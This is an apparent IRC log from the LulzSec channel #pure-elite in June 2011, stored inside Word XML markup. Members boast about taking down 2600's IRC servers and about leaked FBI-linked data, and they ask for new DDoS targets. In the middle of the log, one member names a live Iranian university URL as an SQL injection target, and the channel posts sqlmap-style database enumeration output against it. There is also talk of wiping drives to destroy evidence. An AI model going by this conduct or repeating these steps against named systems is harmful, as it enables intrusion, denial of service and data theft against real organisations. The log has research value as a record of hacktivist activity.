          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 03 23:54:11 storm from 2600 Jun 03 23:54:25 storm and lmao at that guy dancing Jun 03 23:55:00 sabu dude Jun 03 23:55:28 neuron ?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 03 23:56:26 sabu that vid cracks me up Jun 03 23:57:10 storm Sabu Jun 03 23:57:25 sabu sups Jun 03 23:57:25 storm I'm amazed that 2600 took their beating like champs Jun 03 23:57:29 storm and sucked our cocks.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 03 23:57:30 sabu yeh Jun 03 23:57:32 sabu they did Jun 03 23:57:37 sabu gotta understand though Jun 03 23:57:38 storm respect to that Jun 03 23:57:39 storm seriously Jun 03 23:57:42 sabu they're old timers Jun 03 23:57:44 neuron haha Jun 03 23:57:47 sabu so they stil think like that Jun 03 23:57:55 storm heh Jun 03 23:57:58 storm well Jun 03 23:58:06 storm i feel abd for fucking their servers kinda Jun 03 23:58:06 storm ;x Jun 03 23:58:10 storm bad even Jun 03 23:58:13 storm but they deserved it Jun 03 23:58:15 neuron lol Jun 03 23:58:24 storm that was lame that they took registration rights from our channel Jun 03 23:58:44 neuron Anyone know if bt5 has a backdoor like bt4 black hat edition did?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 03 23:58:57 storm we Jun 03 23:58:58 storm er Jun 03 23:59:05 storm we're going to have a backtrack lulzsec version Jun 03 23:59:10 storm so it doesnt matter Jun 03 23:59:13 storm but it doesnt Jun 03 23:59:17 storm that i know of Jun 03 23:59:48 neuron Hmm im debating of just setting my hackbox up has arch again Jun 03 23:59:53 neuron Right now its bt5 Jun 04 00:00:03 neuron but im weary it has a bd Jun 04 00:00:34 storm use ubuntu :D Jun 04 00:00:49 storm arch is cool if you like kde Jun 04 00:00:56 neuron lol Jun 04 00:01:00 neuron i use awesomewm :P Jun 04 00:01:06 storm or gentoo for customisable shit Jun 04 00:03:22 neuron storm: im gonna setup arch again Jun 04 00:03:26 storm :D Jun 04 00:03:28 neuron you guys won't see me for a few hours lol Jun 04 00:03:30 storm KDE is pretty Jun 04 00:03:36 neuron i use awesome-wm Jun 04 00:03:36 storm alright Jun 04 00:03:38 storm later bra Jun 04 00:03:50 neuron http://awesome.naquadah.org/ Jun 04 00:04:48 * storm has quit (Quit: BitchX-1.1-final - just do it.) Jun 04 00:04:58 neuron Sabu: be back in a bit bro Jun 04 00:05:26 sabu kk Jun 04 00:06:34 * foolish (foolish@HA-n2d.mb1.tkrenp.IP) has joined #pure- elite Jun 04 00:06:37 &lt;foolish&gt; there we go Jun 04 00:06:40 * foolish is now known as storm Jun 04 00:06:48 storm had to load up irssi Jun 04 00:07:21 neuron lol Jun 04 00:07:22 neuron wb Jun 04 00:07:25 storm tyty Jun 04 00:07:58 * tflow has quit (A TLS packet with unexpected length was received.) Jun 04 00:08:21 * tflow (tflow@HA-r12.0jd.4c0nch.IP) has joined #pure-elite Jun 04 00:08:33 neuron wb tflow Jun 04 00:29:07 neuron alright guys im out for a bit for a arch install o/ Jun 04 00:29:12 * Neuron has quit (Quit: leaving) Jun 04 00:32:41 sabu goodnight Jun 04 00:46:47 * tflow has quit (A TLS packet with unexpected length was received.) Jun 04 00:52:31 * anonny (anonny@HA-qg9.p22.ibfo0m.IP) has joined #pure- elite Jun 04 00:52:40 * anonny is now known as kl0ps Jun 04 00:52:45 kl0ps hello o/ Jun 04 00:57:53 kl0ps Sabu, lol, good morning :) ... i need a target :/ Jun 04 01:00:32 lol kl0ps hello \:D/ Jun 04 01:00:45 kl0ps \o/ Jun 04 01:00:54 kl0ps kayla :-* :D Jun 04 01:02:01 lol how are you :)?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 01:02:07 kl0ps lulzsec got in germany very famous too ;) Jun 04 01:02:16 lol ;) Jun 04 01:03:04 kl0ps goot, a little bit tired, but ok. i have to programming the hole day 4 study -.- Jun 04 01:03:16 kl0ps i did not sleep this night Jun 04 01:03:22 lol why not :D?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 01:03:38 kl0ps party ;) Jun 04 01:03:53 kl0ps how are u sweety?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 01:04:29 kl0ps brb, buying beer. (yes the crazy germans) :D Jun 04 01:07:45 kl0ps re Jun 04 01:09:50 kl0ps lol, i have ti tried to sqli a iran uni, but i am mistake. have u more luck then me?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>http://intstudy.ut.ac.ir/publication.php?sid=18 Jun 04 01:09:55 kl0ps -i +o Jun 04 01:10:28 kl0ps there is a vuln, but i am not able -.- Jun 04 01:14:33 kl0ps what about i am talking? -.- Jun 04 01:14:34 kl0ps [06:14:07] [INFO] target url appears to be UNION injectable with 6 columns Jun 04 01:14:40 kl0ps sry Jun 04 01:15:12 kl0ps web server operating system: Windows 2003 Jun 04 01:15:12 kl0ps web application technology: PHP 5.2.6, ASP.NET, Microsoft IIS 6.0 Jun 04 01:15:12 kl0ps back-end DBMS: MySQL 5.0.11 Jun 04 01:16:56 lol Count(table_name) of information_schema.tables Where table_schema=0x696E747374756479 is 12 Jun 04 01:16:56 lol Tables found: cnt,country,encountry,enmain,enmain2,ennews,enpublication,gallery,main,main2,news,publication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01:16:56 lol Count(column_name) of information_schema.columns Where table_schema=0x696E747374756479 AND table_name=0x636E74 is 2 Jun 04 01:16:56 lol Columns found: id,count Jun 04 01:16:56 lol Count(column_name) of information_schema.columns Where table_schema=0x696E747374756479 AND table_name=0x636F756E747279 is 7 Jun 04 01:16:56 lol Columns found: id,date,titr,body,lid,img,pdf Jun 04 01:16:56 lol Count(column_name) of information_schema.columns Where table_schema=0x696E747374756479 AND table_name=0x656E636F756E747279 is 7 Jun 04 01:16:56 lol Columns found: id,date,titr,body,lid,img,pdf Jun 04 01:16:56 lol Count(column_name) of information_schema.columns Where table_schema=0x696E747374756479 AND table_name=0x656E6D61696E is 6 Jun 04 01:16:56 lol Columns found: id,date,titr,body,img,pdf Jun 04 01:16:56 lol Count(column_name) of information_schema.columns Where table_schema=0x696E747374756479 AND table_name=0x656E6D61696E32 is 6 Jun 04 01:16:57 lol Columns found: id,date,titr,body,img,pdf Jun 04 01:16:58 lol Count(column_name) of information_schema.columns Where table_schema=0x696E747374756479 AND table_name=0x656E6E657773 is 7 Jun 04 01:16:59 lol Columns found: id,date,type,titr,body,lid,img Jun 04 01:17:00 lol Count(column_name) of information_schema.columns Where table_schema=0x696E747374756479 AND table_name=0x656E7075626C69636174696F6E is 7 Jun 04 01:17:01 lol Columns found: id,date,type,titr,body,img,pdf Jun 04 01:17:02 lol Count(column_name) of information_schema.columns Where table_schema=0x696E747374756479 AND table_name=0x67616C6C657279 is 3 Jun 04 01:17:03 lol Columns found: id,date,titr Jun 04 01:17:04 lol Count(column_name) of information_schema.columns Where table_schema=0x696E747374756479 AND table_name=0x6D61696E is 6 Jun 04 01:17:05 lol Columns found: id,date,titr,body,img,pdf Jun 04 01:17:07 lol Count(column_name) of information_schema.columns Where table_schema=0x696E747374756479 AND table_name=0x6D61696E32 is 6 Jun 04 01:17:07 lol Columns found: id,date,titr,body,img,pdf Jun 04 01:17:08 lol Count(column_name) of information_schema.columns Where table_schema=0x696E747374756479 AND table_name=0x6E657773 is 7 Jun 04 01:17:09 lol Columns found: id,date,type,titr,body,lid,img Jun 04 01:17:10 lol Count(column_name) of information_schema.columns Where table_schema=0x696E747374756479 AND table_name=0x7075626C69636174696F6E is 7 Jun 04 01:17:12 lol Columns found: id,date,type,titr,body,img,pdf Jun 04 01:17:13 lol doesn't look like there's any passwords in it Jun 04 01:17:27 kl0ps [06:17:18] [INFO] retrieved: "&lt;p class="MsoNormal" style="text-align: justify; line-height: 140%; margin: 0cm 0cm 10pt; unicode-bidi: embed; direction: rtl; mso-margin-top-alt: auto; mso-margin- bottom-alt...[06:17:19] [INFO] retrieved: "&lt;p class="MsoNormal" style="text- align: justify; line-height: 140%; margin: 0cm 0cm 10pt; unicode-bidi: embed; direction: rtl; mso-margin-top-alt: auto; mso-margin-bottom- alt...[06:17:20] [INFO] retrieved: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01:17:27 kl0ps ©² · ² ² · ...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 01:17:38 kl0ps ;) Jun 04 01:17:48 kl0ps i think so -.- Jun 04 01:18:29 kl0ps i am dumping the db and we see Jun 04 01:20:59 kl0ps no hit -.- Jun 04 01:27:49 * lol has quit (A TLS packet with unexpected length was received.) Jun 04 01:28:03 * lol (lol@HA-372.t00.0st1iv.IP) has joined #pure-elite Jun 04 01:28:07 kl0ps http://skype-open-source.blogspot.com/ Jun 04 01:28:45 kl0ps without the fucking anti debuggers Jun 04 01:28:47 lol be back later im gonnag etsome rest &lt;3 :) Jun 04 01:28:59 kl0ps hf Jun 04 01:29:13 lol :) Jun 04 01:29:58 * lol is now known as lol|zzZZZZzz Jun 04 01:30:15 * lol|zzZZZZzz is now known as lol|away Jun 04 02:47:24 * kl0ps has quit (Ping timeout: 121 seconds) Jun 04 03:10:24 storm yooo Jun 04 03:10:57 * virtual (virtual@HA-bq2.skb.2n3ihv.IP) has joined #pure- elite Jun 04 03:11:45 * virtual is now known as trollpoll Jun 04 03:11:48 trollpoll morning all Jun 04 03:11:50 storm sup troll Jun 04 03:12:25 trollpoll looking at lulzsec night fishes Jun 04 03:12:32 storm lol Jun 04 03:12:51 trollpoll and loling of course :P Jun 04 03:12:54 storm sabu Jun 04 03:13:07 storm where's my updated target list?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 03:13:14 storm :&gt; Jun 04 03:13:19 trollpoll btw, dont you think that karim affair is more for Anonymous than for lulzsec?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 03:13:23 storm i need stuff to fire my cannons at Jun 04 03:13:36 storm trollpoll: no Jun 04 03:13:39 storm not personallu Jun 04 03:13:44 storm personally even Jun 04 03:14:09 trollpoll because it happen after lulz hacking?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 03:15:50 storm I'm finally able to listen to our recording Jun 04 03:16:13 trollpoll well, anyway, everybody seems to assume that lulzsec = anonymous...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 03:16:43 storm well from wat ive seen Jun 04 03:16:48 storm i have seen the opposite Jun 04 03:16:58 trollpoll hmmm Jun 04 03:16:58 storm where people want anonymous to own us Jun 04 03:17:08 trollpoll lol Jun 04 03:18:22 trollpoll the first phrase Jun 04 03:18:23 trollpoll "It has come to our unfortunate attention that NATO" Jun 04 03:18:33 trollpoll NATO was talking about Anonymous Jun 04 03:18:36 trollpoll not about lulzsec...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 03:19:22 storm I thought it was _anyone_ partaking in anti hacktivism personally.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 03:20:17 trollpoll yes, but they focused on Anonymous Jun 04 03:20:44 trollpoll but, its ok... i just read yesterday something like "lulzsec a part of anonymous group"..</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 03:21:12 storm they'll learn Jun 04 03:21:13 storm :p Jun 04 03:21:14 trollpoll or something like this in a web with some legal stuff about what we do Jun 04 03:22:58 trollpoll &lt;whirlpool&gt; maybe an ATM fetishist _ Jun 04 03:23:01 trollpoll epic lol Jun 04 03:23:20 storm loll Jun 04 03:26:56 * tflow (tflow@HA-r12.0jd.4c0nch.IP) has joined #pure-elite Jun 04 03:27:13 tflow site still up \o/ Jun 04 03:27:18 storm yeah i noticed Jun 04 03:27:19 storm :D Jun 04 03:29:59 * trollpoll has quit (A TLS packet with unexpected length was received.) Jun 04 03:30:20 * trollpoll (rootgratz@HA-s5h.ho4.fu85s5.IP) has joined #pure-elite Jun 04 03:31:39 trollpoll hey, is anonops.blogspot.com our?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 03:59:53 storm where's Topiary Jun 04 03:59:59 storm tweeting away no doubt Jun 04 04:00:42 Topiary ?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 04:00:45 Topiary just woke up Jun 04 04:01:48 * tflow has quit (A TLS packet with unexpected length was received.) Jun 04 04:02:45 * tflow (tflow@HA-r12.0jd.4c0nch.IP) has joined #pure-elite Jun 04 04:09:49 storm lol Jun 04 04:09:51 storm sup?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 04:17:31 storm Topiary: Jun 04 04:17:34 * lol|away is now known as lol Jun 04 04:17:41 storm I need an updated target list to ddos.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 04:18:02 storm 2600.net is old news Jun 04 04:18:13 storm hey Kayla Jun 04 04:18:14 storm &lt;3 :D Jun 04 04:26:24 Topiary hmm not sure man Jun 04 04:35:51 * trollpoll has quit (Quit: Leaving) Jun 04 06:08:47 * neuron (neuron@HA-f21.345.a84vd3.IP) has joined #pure- elite Jun 04 06:08:54 neuron lol took a bit longer then i thought Jun 04 06:09:46 * lol has quit (A TLS packet with unexpected length was received.) Jun 04 06:09:57 * lol (lol@HA-r5m.i6c.9ln5eg.IP) has joined #pure-elite Jun 04 06:10:15 neuron hey lol o.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 06:15:37 lol hey :D Jun 04 06:16:03 neuron what are you doing up this late :P Jun 04 06:16:19 lol :D Jun 04 06:16:22 lol nm :ppPPp Jun 04 06:16:41 neuron lol hax0ring stuff?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 06:22:56 neuron its 3am sleep tiem o./ Jun 04 06:23:02 * neuron has quit (Quit: leaving) Jun 04 06:39:02 storm O_o Jun 04 06:40:02 lol hi storm :D &lt;3 Jun 04 06:40:20 storm hiya Jun 04 06:40:49 lol hows you? :D Jun 04 06:41:15 storm I'm OK.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 06:41:18 storm how're you?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 06:42:48 lol im fine thanks :D just a bit angry lol xD Jun 04 06:43:09 lol lololol i went to go get some cerials from down stairs and i opend my door Jun 04 06:43:23 lol and trapped my toe under the door when i opend it xD Jun 04 06:43:24 lol lmao Jun 04 06:43:28 lol it hurts :( Jun 04 06:43:33 storm ROFL Jun 04 06:43:35 storm wow.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 06:43:38 storm sounds painful.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 06:43:53 lol like the gap under the door xD Jun 04 06:43:59 lol :( Jun 04 06:44:20 lol now im just laid on my bed with my netbook feeling sorry for my self xD Jun 04 06:44:32 lol in pain!</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 06:44:32 lol xD Jun 04 06:44:41 storm haha Jun 04 06:44:47 storm what kinda netbook does u haz?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 06:44:51 storm I'm getting one Jun 04 06:49:31 lol just a silly asus thing :D Jun 04 06:49:41 lol lol Jun 04 06:49:42 lol There are 0 users and 32 invisible on 1 servers Jun 04 06:49:42 lol 1 IRC Operators online Jun 04 06:49:42 lol 20 channels formed Jun 04 06:49:42 lol I have 32 clients and 0 servers Jun 04 06:49:42 lol - Jun 04 06:49:42 lol Current local users: 32 Max: 32 Jun 04 06:49:42 lol Current global users: 32 Max: 32 Jun 04 06:49:42 lol - Jun 04 06:49:42 lol Highest connection count: 32 (32 clients) (133 connections received) Jun 04 06:49:42 lol - Jun 04 06:49:43 lol collective.2600.net ------------------------------ | Users: 32 (100.0%) Jun 04 06:49:44 lol End of /MAP Jun 04 06:49:53 lol lol 2600 is dead xD Jun 04 06:51:39 * joepie91 has quit (Ping timeout: 121 seconds) Jun 04 06:51:42 storm lol Jun 04 06:51:45 * joepie91 (joepie91@HA-u3g.pbq.j3hiks.IP) has joined #pure- elite Jun 04 06:51:46 storm i feel bad Jun 04 06:51:47 storm :&lt; Jun 04 06:52:27 storm asus' are good netbooks Jun 04 06:52:38 storm i almost got one Jun 04 06:53:53 lol they good, but i should have really got one with a HDD rather than an SSD because SSD's only have a certain ammount of writes Jun 04 06:54:04 lol so shredding everything with guttman can't be good for it :S Jun 04 06:54:20 storm lol.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 06:54:30 storm I'll be shredding my wntire system when my laptop comes Jun 04 06:54:36 storm entire even.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 06:54:40 lol DBAN :D Jun 04 06:54:51 lol use DBAN :DDD Jun 04 06:54:58 lol good old boot and nuke Jun 04 06:54:58 * storm duly noted Jun 04 06:55:22 storm i dont have much i wish to save Jun 04 06:55:35 storm maybe some porn, music, and some sensetive files Jun 04 06:55:39 storm :D Jun 04 06:56:09 lol lol xD Jun 04 07:00:29 storm im brushing my teeth &gt;;x Jun 04 07:00:44 lol :D Jun 04 07:07:10 joepie91 morning all Jun 04 07:07:14 joepie91 also, om nom nom ddos Jun 04 07:07:29 storm lol Jun 04 07:07:29 storm hi Jun 04 07:13:30 storm 11:12 -!- madjack.2600.net --------------------------- ------ | Users: 126 (22.2%) Jun 04 07:13:33 storm 11:12 -!- '- blackbeard.2600.net --------------------- ----- | Users: 0 (0.0%) Jun 04 07:13:36 storm 11:12 -!- |- bartholomew.2600.net -------------------- - | Users: 105 (18.5%) Jun 04 07:13:40 storm 11:12 -!- |- djslocker.2600.net ---------------------- - | Users: 327 (57.7%) Jun 04 07:13:43 storm 11:12 -!- '- services.2600.net ----------------------- - | Users: 9 Jun 04 07:13:45 storm collective was unlinked Jun 04 07:13:50 lol lol Jun 04 07:13:52 lol xD Jun 04 07:13:58 * t[2] (t@HA-5u1.rkn.75e5ku.IP) has joined #pure-elite Jun 04 07:14:03 storm ;p Jun 04 07:15:46 &lt;t[2]&gt; Account Balance is: 24.52 BTC (414.39 USD @ 16.90) Jun 04 07:15:48 &lt;t[2]&gt; our donations Jun 04 07:15:49 storm kayla were you bottle_of_rum?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 07:15:54 storm jesus christ Jun 04 07:15:57 storm nice job Jun 04 07:16:24 &lt;t[2]&gt; bottle of rum = tflow Jun 04 07:17:12 * Topiary has quit (Ping timeout: 121 seconds) Jun 04 07:17:43 tflow kayla was parr0t Jun 04 07:18:32 lol why lol :D?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 07:18:38 lol i was parr0t ;3 Jun 04 07:21:17 * t[2] is now known as Topiary Jun 04 07:21:20 * Topiary has quit (Quit: --&gt;) Jun 04 07:21:26 * Topiary (t@HA-5u1.rkn.75e5ku.IP) has joined #pure-elite Jun 04 07:21:36 Topiary exciting and new Jun 04 07:24:21 Topiary You have 38,739 followers Jun 04 07:24:34 Topiary http://pastebin.com/trends Jun 04 07:24:48 tflow we should really probably make a pastebin account Jun 04 07:25:10 tflow but already taken Jun 04 07:25:18 tflow http://pastebin.com/u/lulzsec Jun 04 07:32:13 joepie91 @2600 Jun 04 07:32:14 joepie91 2600 Magazine Jun 04 07:32:14 joepie91 Hacked websites, corporate infiltration/scandal, IRC wars, new hacker groups making global headlines - the 1990s are back! Jun 04 07:32:14 joepie91 lol Jun 04 07:32:32 joepie91 also Jun 04 07:32:38 joepie91 fucking lol'd @ norton comment Jun 04 07:36:03 joepie91 LOL Jun 04 07:36:10 joepie91 did you guys notice how practically noone reported on the FBI hack?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 07:36:19 tflow that's because it's saturday Jun 04 07:36:26 tflow same thing happened with acs law Jun 04 07:36:31 tflow we released on friday Jun 04 07:36:35 tflow 0 reports Jun 04 07:36:38 tflow then come monday Jun 04 07:36:41 tflow 300 reports Jun 04 07:36:52 joepie91 I know Jun 04 07:36:55 joepie91 but even the blogs Jun 04 07:37:01 joepie91 who are usually very quick with reporting on things Jun 04 07:37:08 joepie91 haven't really written shit so far :p Jun 04 07:37:13 tflow true Jun 04 07:37:18 tflow like kerbs hasn't reported it yet Jun 04 07:37:23 tflow although sophos has Jun 04 07:37:27 Topiary a few have written on us Jun 04 07:37:29 joepie91 ya, indeed, I noticed naked security Jun 04 07:37:41 Topiary International Business Times, cnet, Parmy is doing a piece later today Jun 04 07:38:03 Topiary LAtimes Jun 04 07:38:09 joepie91 CNET, LA Times, IB Times, INQUISITR, Sophos Jun 04 07:38:11 joepie91 that's my list atm Jun 04 07:38:34 joepie91 http://www.inquisitr.com/111203/how-to-piss-off- the-fbi-hack-their-buddys-infragard-site/ Jun 04 07:38:39 Topiary yeah Jun 04 07:38:50 joepie91 people should use things like google news more Jun 04 07:38:54 joepie91 broadens their view etc Jun 04 07:39:25 Topiary you know, even without our pastebin being linked on news sites, it still has around 55,000 views Jun 04 07:39:48 joepie91 lol Jun 04 07:42:41 joepie91 "Had we agreed to provide this data to them, LulzSec would have been able to grow the size and scope of their DDoS (distributed denial-of-service) attack and fraud capabilities." Jun 04 07:42:42 joepie91 lol Jun 04 07:42:43 joepie91 wat Jun 04 07:43:26 joepie91 &gt;fraud capabilities Jun 04 07:44:05 Topiary I replied to him Jun 04 07:44:13 Topiary http://pastebin.com/AjVd0L9E Jun 04 07:44:59 joepie91 A Nintendo spokesman released this statement when asked for comment: "The protection of our customer information is our utmost priority. Therefore, we constantly monitor our security. This particular situation was a server configuration issue that we investigated and resolved a few weeks ago. The server contained no consumer information." Jun 04 07:45:00 joepie91 true?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
